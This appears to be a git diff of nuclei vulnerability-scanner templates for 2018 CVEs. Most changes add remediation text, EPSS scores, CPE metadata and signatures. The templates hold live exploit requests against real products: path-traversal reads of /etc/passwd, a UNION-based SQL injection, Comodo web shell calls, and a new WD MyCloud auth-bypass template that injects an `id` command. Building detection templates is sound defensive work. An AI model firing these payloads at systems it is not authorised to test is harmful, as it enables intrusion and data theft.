allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion. + remediation: | + Apply the latest security patches or upgrade to a patched version of LG SuperSign EZ CMS. reference: - https://www.exploit-db.com/exploits/45440 - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html @@ -15,9 +17,14 @@ info: cvss-score: 8.6 cve-id: CVE-2018-16288 cwe-id: CWE-200 - tags: cve,cve2018,lfi,supersign,edb + epss-score: 0.24588 + epss-percentile: 0.96096 + cpe: cpe:2.3:a:lg:supersign_cms:2.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lg + product: supersign_cms + tags: cve,cve2018,lfi,supersign,edb http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/13 +# digest: 4b0a00483046022100c50f2f4c9387bfc69ba043c61ae496b5cef55b75c85f2e6306da037c1a0cb65d022100ed7d9e84474f3aefa8c7c24caef1c1cb86069737ff70edb3f6b2695585ada2ad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16299.yaml b/http/cves/2018/CVE-2018-16299.yaml index 1ef5d61ed7..8ff0d3cb4f 100644 --- a/http/cves/2018/CVE-2018-16299.yaml +++ b/http/cves/2018/CVE-2018-16299.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Localize My Post 1.0 is susceptible to local file inclusion via the ajax/include.php file parameter. + remediation: | + Update to the latest version of WordPress Localize My Post plugin. reference: - https://www.exploit-db.com/exploits/45439 - https://packetstormsecurity.com/files/149433/WordPress-Localize-My-Post-1.0-Local-File-Inclusion.html @@ -16,9 +18,15 @@ info: cvss-score: 7.5 cve-id: CVE-2018-16299 cwe-id: CWE-22 - tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018 + epss-score: 0.03312 + epss-percentile: 0.90248 + cpe: cpe:2.3:a:localize_my_post_project:localize_my_post:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: localize_my_post_project + product: localize_my_post + framework: wordpress + tags: wordpress,lfi,plugin,wp,edb,packetstorm,cve,cve2018 http: - method: GET @@ -27,7 +35,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/13 +# digest: 4a0a0047304502210086591a88a9cf812478916fde313fda7131d3c95f29e04c9173e8349300df634102201487eb64c9df4389d3fa608691ca37eec59fae49f5b0173eeba53ab2b54ba821:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16341.yaml b/http/cves/2018/CVE-2018-16341.yaml index 32317f20e6..d581ad135f 100644 --- a/http/cves/2018/CVE-2018-16341.yaml +++ b/http/cves/2018/CVE-2018-16341.yaml @@ -6,13 +6,15 @@ info: severity: high description: | Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection. - classification: - cve-id: CVE-2018-16341 + remediation: | + Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-16299 - tags: cve,cve2018,nuxeo,ssti,rce,bypass + classification: + cve-id: CVE-2018-16341 metadata: max-request: 1 + tags: cve,cve2018,nuxeo,ssti,rce,bypass http: - method: GET @@ -25,4 +27,4 @@ http: words: - "31333333337" -# Enhanced by mp on 2022/06/13 +# digest: 490a00463044022059a51103f6f4ecdcf4d6c60198ce852e3a140a9ab22cf3171b45345cc35dac9c022071bb3d4196fbb3916aa58945e922a4035e8e72aa9f65794a75547ecbf3f05bd6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml index be9ced8df6..46a12082e9 100644 --- a/http/cves/2018/CVE-2018-16668.yaml +++ b/http/cves/2018/CVE-2018-16668.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CirCarLife before 4.3 is susceptible to improper authentication. An internal installation path disclosure exists due to the lack of authentication for /html/repository.System. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue. reference: - https://www.exploit-db.com/exploits/45384 - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life @@ -15,11 +17,14 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16668 cwe-id: CWE-287 + epss-score: 0.00248 + epss-percentile: 0.62459 cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* - epss-score: 0.00376 - tags: cve,cve2018,circarlife,scada,iot,disclosure,edb metadata: max-request: 1 + vendor: circontrol + product: circarlife_scada + tags: cve,cve2018,circarlife,scada,iot,disclosure,edb http: - method: GET @@ -32,6 +37,7 @@ http: part: header words: - "CirCarLife Scada" + - type: word part: body words: @@ -39,4 +45,4 @@ http: - "** Application sources **" condition: and -# Enhanced by md on 2023/01/30 +# digest: 4b0a00483046022100d5b58bb7933183fdc53320d29d10ece7cb38d9d8f214e7a789625fef1d8ed3160221009f84b6cd7619d94952bcca6c3719109c3f7f9534518a9b7a929cefeeaf2df2dc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16670.yaml b/http/cves/2018/CVE-2018-16670.yaml index a503d7c87a..0405e3743e 100644 --- a/http/cves/2018/CVE-2018-16670.yaml +++ b/http/cves/2018/CVE-2018-16670.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CirCarLife before 4.3 is susceptible to improper authentication. A PLC status disclosure exists due to lack of authentication for /html/devstat.html. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue. reference: - https://www.exploit-db.com/exploits/45384 - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life @@ -15,9 +17,14 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16670 cwe-id: CWE-287 - tags: scada,plc,iot,disclosure,edb,cve,cve2018,circarlife + epss-score: 0.00132 + epss-percentile: 0.47879 + cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: circontrol + product: circarlife_scada + tags: scada,plc,iot,disclosure,edb,cve,cve2018,circarlife http: - method: GET @@ -30,6 +37,7 @@ http: part: header words: - "CirCarLife Scada" + - type: word part: body words: @@ -37,4 +45,4 @@ http: - "Reader.STATUS" condition: and -# Enhanced by md on 2023/01/30 +# digest: 4b0a00483046022100c861c038f5ab1c9ef8fa08b272512a443ca35486a84bf610fbfc1b1aae787f8d022100b7680174852497f96c8ed8b9318639898707c73a75d3fa38cc300408e6f62847:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml index 8c70064a83..55ab0a934b 100644 --- a/http/cves/2018/CVE-2018-16671.yaml +++ b/http/cves/2018/CVE-2018-16671.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: CirCarLife before 4.3 is susceptible to improper authentication. A system software information disclosure exists due to lack of authentication for /html/device-id. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue. reference: - https://www.exploit-db.com/exploits/45384 - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life @@ -14,9 +16,14 @@ info: cvss-score: 5.3 cve-id: CVE-2018-16671 cwe-id: CWE-200 - tags: iot,disclosure,edb,cve,cve2018,circarlife,scada + epss-score: 0.00251 + epss-percentile: 0.6281 + cpe: cpe:2.3:a:circontrol:circarlife_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: "circontrol" + product: circarlife_scada + tags: iot,disclosure,edb,cve,cve2018,circarlife,scada http: - method: GET @@ -29,13 +36,15 @@ http: part: header words: - "CirCarLife Scada" + - type: word part: body words: - "circontrol" + - type: regex part: body regex: - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])" -# Enhanced by md on 2023/01/30 +# digest: 4a0a00473045022100b7dc81184d133fc85eab456378d2a006dab6e23380034d93e0e021a288e554ca02206b0debda47784ac6ed6e23374941263f094431d68fcadc6137fbff971385e830:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml index 87b983eb8b..2fcb439824 100644 --- a/http/cves/2018/CVE-2018-16716.yaml +++ b/http/cves/2018/CVE-2018-16716.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string. + remediation: | + Apply the latest patch or update from the vendor to fix the directory traversal vulnerability in the NCBI ToolBox. reference: - https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md - https://nvd.nist.gov/vuln/detail/CVE-2018-16716 @@ -13,9 +15,14 @@ info: cvss-score: 9.1 cve-id: CVE-2018-16716 cwe-id: CWE-22 - tags: cve,cve2018,ncbi,lfi + epss-score: 0.00544 + epss-percentile: 0.74795 + cpe: cpe:2.3:a:nih:ncbi_toolbox:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nih + product: ncbi_toolbox + tags: cve,cve2018,ncbi,lfi http: - method: GET @@ -32,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/18 +# digest: 490a00463044022079e088f9053e2ef2b17971ea0705b969a13bdffd5207a68f595564802ea62ad002201d37640984e3da2f94556a125ce3a57eb45eedc25162de809a435b24cfe05688:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml index 80317b2d50..6fd837a556 100644 --- a/http/cves/2018/CVE-2018-16761.yaml +++ b/http/cves/2018/CVE-2018-16761.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability. reference: - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/ - https://github.com/eventum/eventum/releases/tag/v3.4.0 @@ -15,9 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16761 cwe-id: CWE-601 - tags: cve,cve2018,redirect,eventum,oss + epss-score: 0.00068 + epss-percentile: 0.28418 + cpe: cpe:2.3:a:eventum_project:eventum:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: eventum_project + product: eventum + tags: cve,cve2018,redirect,eventum,oss http: - method: GET @@ -32,4 +39,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/13 +# digest: 490a00463044022035e105021657e6106c39e02ba70d44b57bae6677626d6c4c18df2215ad794df102202fa4304751d369e93793e98c97174d00045fa26dacadd21cc4f378632024cdc0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml index 7ed6427265..240accec47 100644 --- a/http/cves/2018/CVE-2018-16763.yaml +++ b/http/cves/2018/CVE-2018-16763.yaml @@ -5,21 +5,27 @@ info: author: pikpikcu severity: critical description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter. + remediation: | + Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability. reference: - https://www.exploit-db.com/exploits/47138 - https://www.getfuelcms.com/ - https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 - https://nvd.nist.gov/vuln/detail/CVE-2018-16763 + - https://github.com/daylightstudio/FUEL-CMS/issues/478 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16763 cwe-id: CWE-74 + epss-score: 0.83439 + epss-percentile: 0.98087 cpe: cpe:2.3:a:thedaylightstudio:fuel_cms:*:*:*:*:*:*:*:* - epss-score: 0.88022 - tags: cve,cve2018,fuelcms,rce,edb metadata: max-request: 1 + vendor: thedaylightstudio + product: fuel_cms + tags: cve,cve2018,fuelcms,rce,edb http: - raw: @@ -29,11 +35,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/05/12 + - type: status + status: + - 200 + +# digest: 490a0046304402205d104df7eabc9b4927f7404e4dd27bc374592c90095bd7aa91898edcb4a2c92302205dd4dba704bece384ef6ef236bcd2ddf452bb0395fbd1d83eb109a99abb12460:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml index 3c8b694c6d..26c10a945d 100644 --- a/http/cves/2018/CVE-2018-16836.yaml +++ b/http/cves/2018/CVE-2018-16836.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: critical description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI. + remediation: | + Upgrade to a patched version of Rubedo CMS (>=3.4.1) or apply the provided security patch. reference: - https://www.exploit-db.com/exploits/45385 - https://nvd.nist.gov/vuln/detail/CVE-2018-16836 @@ -15,11 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2018-16836 cwe-id: CWE-22 + epss-score: 0.29944 + epss-percentile: 0.96404 cpe: cpe:2.3:a:rubedo_project:rubedo:*:*:*:*:*:*:*:* - epss-score: 0.25354 - tags: cve,cve2018,rubedo,lfi,edb metadata: max-request: 1 + vendor: rubedo_project + product: rubedo + tags: cve,cve2018,rubedo,lfi,edb http: - method: GET @@ -36,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/13 +# digest: 4a0a00473045022100e796dec7c0bd948d986c43ca2dc7e4326e6ac886265b25a340de30e41cfc72fb02201be4e8b1dcb026b893fbd9dd9b124d6fc780ebfb4aaa23fc3fa7cd05147375c4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml index 84a59a0192..3e0cbd284b 100644 --- a/http/cves/2018/CVE-2018-16979.yaml +++ b/http/cves/2018/CVE-2018-16979.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943. + remediation: | + Upgrade Monstra CMS to version 3.0.5 or later to mitigate the HTTP Header Injection vulnerability. reference: - https://github.com/howchen/howchen/issues/4 - https://nvd.nist.gov/vuln/detail/CVE-2018-16979 @@ -14,9 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-16979 cwe-id: CWE-113 + epss-score: 0.00118 + epss-percentile: 0.45607 + cpe: cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: monstra + product: monstra tags: cve,cve2018,crlf,mostra,mostracms,cms http: @@ -37,4 +44,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/03 +# digest: 4a0a004730450220399e1a1661a77b6a5a5c2633832514326010e65a17e5b1e36dc842e32b6ce8ec022100c8ba0cfc86d1adc04827b2ee0a361e4070fdcebf4596f8874f4bd6f9f5ed4652:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml new file mode 100644 index 0000000000..fad47b519f --- /dev/null +++ b/http/cves/2018/CVE-2018-17153.yaml @@ -0,0 +1,51 @@ +id: CVE-2018-17153 + +info: + name: Western Digital MyCloud NAS - Authentication Bypass + author: DhiyaneshDk + severity: critical + description: | + It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \"cgi_get_ipv6\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \"flag\" with the value \"1\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie. + remediation: | + Apply the latest firmware update provided by Western Digital to fix the authentication bypass vulnerability. + reference: + - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/ + - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html + - https://securify.nl/nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html + - https://nvd.nist.gov/vuln/detail/CVE-2016-10108 + - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-17153 + cwe-id: CWE-287 + epss-score: 0.92144 + epss-percentile: 0.98644 + cpe: cpe:2.3:o:western_digital:my_cloud_wdbctl0020hwt_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: western_digital + product: my_cloud_wdbctl0020hwt_firmware + shodan-query: http.favicon.hash:-1074357885 + tags: packetstorm,cve,cve2018,auth-bypass,rce,wdcloud + +http: + - raw: + - | + POST /web/google_analytics.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Cookie: isAdmin=1; username=admin; + + cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23 + + matchers: + - type: dsl + dsl: + - regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)", body) + - contains(body, "ganalytics") + - status_code == 200 + condition: and + +# digest: 4a0a00473045022100ad1c86ad935372ce818adc2f392607576b49b4972e1ec0dfb0e264e17550705902202f4e6441a591a968d65035358b97d1cd0c138928d4b0a4e1150a16816f08f379:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml index 9da237ab2b..a6c683fb9f 100644 --- a/http/cves/2018/CVE-2018-17246.yaml +++ b/http/cves/2018/CVE-2018-17246.yaml @@ -5,19 +5,27 @@ info: author: princechaddha,thelicato severity: critical description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system. + remediation: | + Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: - https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md - https://www.elastic.co/community/security - https://discuss.elastic.co/t/elastic-stack-6-4-3-and-5-6-13-security-update/155594 - https://nvd.nist.gov/vuln/detail/CVE-2018-17246 + - https://access.redhat.com/errata/RHBA-2018:3743 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17246 - cwe-id: CWE-829 - tags: cve,cve2018,lfi,kibana,vulhub + cwe-id: CWE-829,CWE-73 + epss-score: 0.96913 + epss-percentile: 0.9962 + cpe: cpe:2.3:a:elastic:kibana:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: elastic + product: "kibana" + tags: cve,cve2018,lfi,kibana,vulhub http: - method: GET @@ -36,12 +44,12 @@ http: words: - "kbn-name" - "kibana" - condition: or case-insensitive: true + condition: or - type: word part: header words: - "application/json" -# Enhanced by mp on 2023/01/15 +# digest: 490a00463044022033b86aa2b647d0e07bc9894bc306cf748a288da2c2b347b4fcaf5cdb9a33a685022063d803a9f02a4065779166504ad1306180195d2e57e34dcd6197744bf0f6a736:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml index 3c59225818..aedf8cc7e5 100644 --- a/http/cves/2018/CVE-2018-17254.yaml +++ b/http/cves/2018/CVE-2018-17254.yaml @@ -5,25 +5,31 @@ info: author: Suman_Kar severity: critical description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. + remediation: Update or remove the affected plugin. reference: - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html - https://www.exploit-db.com/exploits/45423/ - remediation: Update or remove the affected plugin. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17254 cwe-id: CWE-89 - cpe: cpe:2.3:a:arkextensions:jck_editor:*:*:*:*:*:*:*:* - epss-score: 0.8697 - tags: cve,cve2018,packetstorm,edb,joomla,sqli + epss-score: 0.81793 + epss-percentile: 0.98009 + cpe: cpe:2.3:a:arkextensions:jck_editor:6.4.4:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + vendor: arkextensions + product: jck_editor + framework: joomla\! + tags: cve,cve2018,packetstorm,edb,joomla,sqli +variables: + num: "999999999" http: - raw: - | - GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1 + GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} @@ -31,6 +37,6 @@ http: - type: word part: body words: - - "nuclei-template" + - '{{md5(num)}}' -# Enhanced by mp on 2022/02/08 +# digest: 480a0045304302204c84c4884bf97caefbe2d95365b2e3220c663c096d9543e73c083e591d72099a021f56bd305b2a3f3a98b9bc7ce45172cfb84e9c34fba36fe03e1517e7e6a379e2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml index 6865d17e2f..48d42032a5 100644 --- a/http/cves/2018/CVE-2018-17422.yaml +++ b/http/cves/2018/CVE-2018-17422.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability. reference: - https://github.com/dotCMS/core/issues/15286 - https://nvd.nist.gov/vuln/detail/CVE-2018-17422 @@ -14,9 +16,14 @@ info: cvss-score: 6.1 cve-id: CVE-2018-17422 cwe-id: CWE-601 + epss-score: 0.00118 + epss-percentile: 0.45607 + cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: dotcms + product: dotcms shodan-query: http.title:"dotCMS" tags: cve,cve2018,redirect,dotcms @@ -34,4 +41,4 @@ http: - "self.location = 'http://evil.com'" - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# Enhanced by md on 2022/10/13 +# digest: 4b0a004830460221008e157da653657afa1b46703f3b0f07f6b3a6ddcfb282eda1b7c2d67aa9821feb0221008ce1909e513f61fe5353c29acd093f5585528c243b4393d5e045f0c288884336:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml index dc5ae4e713..2837479ef9 100644 --- a/http/cves/2018/CVE-2018-17431.yaml +++ b/http/cves/2018/CVE-2018-17431.yaml @@ -5,21 +5,27 @@ info: author: dwisiswant0 severity: critical description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability. + remediation: | + Apply the latest security patches or updates provided by Comodo to fix this vulnerability. reference: - https://www.exploit-db.com/exploits/48825 - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276 - https://nvd.nist.gov/vuln/detail/CVE-2018-17431 - https://github.com/Fadavvi/CVE-2018-17431-PoC#confirmation-than-bug-exist-2018-09-25-ticket-id-xwr-503-79437 + - https://drive.google.com/file/d/0BzFJhNQNHcoTbndsUmNjVWNGYWNJaWxYcWNyS2ZDajluTDFz/view classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-17431 cwe-id: CWE-287 + epss-score: 0.10458 + epss-percentile: 0.94366 cpe: cpe:2.3:a:comodo:unified_threat_management_firewall:*:*:*:*:*:*:*:* - epss-score: 0.09083 - tags: cve2018,comodo,rce,edb,cve metadata: max-request: 2 + vendor: comodo + product: unified_threat_management_firewall + tags: cve2018,comodo,rce,edb,cve http: - raw: @@ -27,7 +33,6 @@ http: GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1 Host: {{Hostname}} Connection: close - - | # to triggering RCE GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1 Host: {{Hostname}} @@ -36,11 +41,12 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Configuration has been altered" - part: body + - type: status status: - 200 -# Enhanced by mp on 2022/05/13 +# digest: 4a0a004730450220200bd9b3a6449d159a8e874c97fa9ba7b8a130bfbeff32320f499a60d95f4211022100bb51fb1ea5cc3b711d0b07b7ef766378617836f15d5a9a6dfc0d5c1bcbde2622:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml index b8171c5dff..ba7e9da7fb 100644 --- a/http/cves/2018/CVE-2018-18069.yaml +++ b/http/cves/2018/CVE-2018-18069.yaml @@ -4,8 +4,9 @@ info: name: WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting author: nadino severity: medium - description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php - request to wp-admin/admin.php. + description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php. + remediation: | + Update WordPress sitepress-multilingual-cms to the latest version to mitigate the XSS vulnerability. reference: - https://0x62626262.wordpress.com/2018/10/08/sitepress-multilingual-cms-plugin-unauthenticated-stored-xss/ - https://nvd.nist.gov/vuln/detail/CVE-2018-18069 @@ -14,9 +15,15 @@ info: cvss-score: 6.1 cve-id: CVE-2018-18069 cwe-id: CWE-79 - tags: cve,cve2018,wordpress,xss,plugin + epss-score: 0.00106 + epss-percentile: 0.42969 + cpe: cpe:2.3:a:wpml:wpml:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: wpml + product: wpml + framework: wordpress + tags: cve,cve2018,wordpress,xss,plugin http: - method: POST @@ -25,7 +32,6 @@ http: body: | icl_post_action=save_theme_localization&locale_file_name_en=EN"> - host-redirects: true max-redirects: 2 matchers: @@ -36,4 +42,4 @@ http: - 'contains(body, "\">")' condition: and -# Enhanced by mp on 2022/04/08 +# digest: 4a0a00473045022100d84959c99cabda60a5999b44fe4d326e2634d985e8401368c6c14c43688c24a6022053a8fc1324d4edf6d67cbf6b010c8a3546ec6ff419f683ae27558acf91005977:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml index 1600747d97..55bac4be16 100644 --- a/http/cves/2018/CVE-2018-18264.yaml +++ b/http/cves/2018/CVE-2018-18264.yaml @@ -6,18 +6,26 @@ info: severity: high description: | Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. + remediation: | + Upgrade to Kubernetes Dashboard version 1.10.1 or later to mitigate the authentication bypass vulnerability. reference: - https://github.com/kubernetes/dashboard/pull/3289 - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/ - https://groups.google.com/forum/#!topic/kubernetes-announce/yBrFf5nmvfI - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 + - https://github.com/kubernetes/dashboard/pull/3400 classification: cvss-metrics: 